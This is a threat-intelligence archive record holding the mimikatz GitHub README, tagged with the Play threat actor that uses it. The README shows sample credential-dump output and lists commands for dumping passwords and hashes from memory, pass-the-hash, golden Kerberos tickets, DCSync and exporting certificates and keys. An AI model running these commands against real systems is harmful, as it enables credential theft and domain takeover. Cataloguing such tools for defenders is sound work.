{
	"id": "c1f9e913-31bd-4292-9791-011f3286c065",
	"created_at": "2026-04-06T00:09:32.132051Z",
	"updated_at": "2026-04-10T03:30:33.184725Z",
	"deleted_at": null,
	"sha1_hash": "68a8f729972e4da9b02ec3b6de47893ad9eec2e8",
	"title": "GitHub - gentilkiwi/mimikatz: A little tool to play with Windows security",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 108262,
	"plain_text": "GitHub - gentilkiwi/mimikatz: A little tool to play with Windows\r\nsecurity\r\nBy gentilkiwi\r\nArchived: 2026-04-05 15:13:56 UTC\r\nmimikatz is a tool I've made to learn C and make somes experiments with Windows security.\r\nIt's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory.\r\nmimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.\r\n .#####. mimikatz 2.0 alpha (x86) release \"Kiwi en C\" (Apr 6 2014 22:02:03)\r\n .## ^ ##.\r\n ## / \\ ## /* * *\r\n ## \\ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\r\n '## v ##' https://blog.gentilkiwi.com/mimikatz (oe.eo)\r\n '#####' with 13 modules * * */\r\nmimikatz # privilege::debug\r\nPrivilege '20' OK\r\n \r\nmimikatz # sekurlsa::logonpasswords\r\n \r\nAuthentication Id : 0 ; 515764 (00000000:0007deb4)\r\nSession : Interactive from 2\r\nUser Name : Gentil Kiwi\r\nDomain : vm-w7-ult-x\r\nSID : S-1-5-21-1982681256-1210654043-1600862990-1000\r\n msv :\r\n [00000003] Primary\r\n * Username : Gentil Kiwi\r\n * Domain : vm-w7-ult-x\r\n * LM : d0e9aee149655a6075e4540af1f22d3b\r\n * NTLM : cc36cf7a8514893efccd332446158b1a\r\n * SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30\r\n tspkg :\r\n * Username : Gentil Kiwi\r\n * Domain : vm-w7-ult-x\r\n * Password : waza1234/\r\n...\r\nhttps://github.com/gentilkiwi/mimikatz\r\nPage 1 of 4\n\nBut that's not all! Crypto , Terminal Server , Events , ... lots of informations in the GitHub Wiki\r\nhttps://github.com/gentilkiwi/mimikatz/wiki or on https://blog.gentilkiwi.com (in French, yes).\r\nIf you don't want to build it, binaries are availables on https://github.com/gentilkiwi/mimikatz/releases\r\nQuick usage\r\nsekurlsa\r\nsekurlsa::logonpasswords\r\nsekurlsa::tickets /export\r\nsekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd\r\nkerberos\r\nkerberos::list /export\r\nkerberos::ptt c:\\chocolate.kirbi\r\nkerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /kr\r\ncrypto\r\ncrypto::capi\r\ncrypto::cng\r\ncrypto::certificates /export\r\ncrypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE\r\ncrypto::keys /export\r\ncrypto::keys /machine /export\r\nvault \u0026 lsadump\r\nvault::cred\r\nvault::list\r\ntoken::elevate\r\nvault::cred\r\nvault::list\r\nlsadump::sam\r\nlsadump::secrets\r\nlsadump::cache\r\ntoken::revert\r\nhttps://github.com/gentilkiwi/mimikatz\r\nPage 2 of 4\n\nlsadump::dcsync /user:domain\\krbtgt /domain:lab.local\r\nBuild\r\nmimikatz is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so\r\nprerequisites are:\r\nfor mimikatz and mimilib : Visual Studio 2010, 2012 or 2013 for Desktop (2013 Express for Desktop\r\nis free and supports x86 \u0026 x64 - http://www.microsoft.com/download/details.aspx?id=44914)\r\nfor mimikatz driver , mimilove (and ddk2003 platform) : Windows Driver Kit 7.1 (WinDDK) -\r\nhttp://www.microsoft.com/download/details.aspx?id=11800\r\nmimikatz uses SVN for source control, but is now available with GIT too! You can use any tools you want to\r\nsync, even incorporated GIT in Visual Studio 2013 =)\r\nSynchronize!\r\nGIT URL is : https://github.com/gentilkiwi/mimikatz.git\r\nSVN URL is : https://github.com/gentilkiwi/mimikatz/trunk\r\nZIP file is : https://github.com/gentilkiwi/mimikatz/archive/master.zip\r\nBuild the solution\r\nAfter opening the solution, Build / Build Solution (you can change architecture)\r\nmimikatz is now built and ready to be used! ( Win32 / x64 even ARM64 if you're lucky)\r\nyou can have error MSB3073 about _build_.cmd and mimidrv , it's because the driver cannot be\r\nbuild without Windows Driver Kit 7.1 (WinDDK), but mimikatz and mimilib are OK.\r\nddk2003\r\nWith this optional MSBuild platform, you can use the WinDDK build tools, and the default msvcrt runtime\r\n(smaller binaries, no dependencies)\r\nFor this optional platform, Windows Driver Kit 7.1 (WinDDK) -\r\nhttp://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio 2010 are mandatory, even if you\r\nplan to use Visual Studio 2012 or 2013 after.\r\nFollow instructions:\r\nhttps://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme\r\nhttps://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader\r\nContinuous Integration\r\nmimikatz project is available on AppVeyor - https://ci.appveyor.com/project/gentilkiwi/mimikatz\r\nhttps://github.com/gentilkiwi/mimikatz\r\nPage 3 of 4\n\nIts status is: build passing\r\nLicence\r\nCC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/\r\nmimikatz needs coffee to be developed:\r\nPayPal: https://www.paypal.me/delpy/\r\nAuthor\r\nBenjamin DELPY gentilkiwi , you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at]\r\ngentilkiwi.com )\r\nDCSync and DCShadow functions in lsadump module were co-writed with Vincent LE TOUX, you can\r\ncontact him by mail ( vincent.letoux [at] gmail.com ) or visit his website ( http://www.mysmartlogon.com )\r\nThis is a personal development, please respect its philosophy and don't use it for bad things!\r\nSource: https://github.com/gentilkiwi/mimikatz\r\nhttps://github.com/gentilkiwi/mimikatz\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://github.com/gentilkiwi/mimikatz"
	],
	"report_names": [
		"mimikatz"
	],
	"threat_actors": [
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434172,
	"ts_updated_at": 1775791833,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/68a8f729972e4da9b02ec3b6de47893ad9eec2e8.pdf",
		"text": "https://archive.orkl.eu/68a8f729972e4da9b02ec3b6de47893ad9eec2e8.txt",
		"img": "https://archive.orkl.eu/68a8f729972e4da9b02ec3b6de47893ad9eec2e8.jpg"
	}
}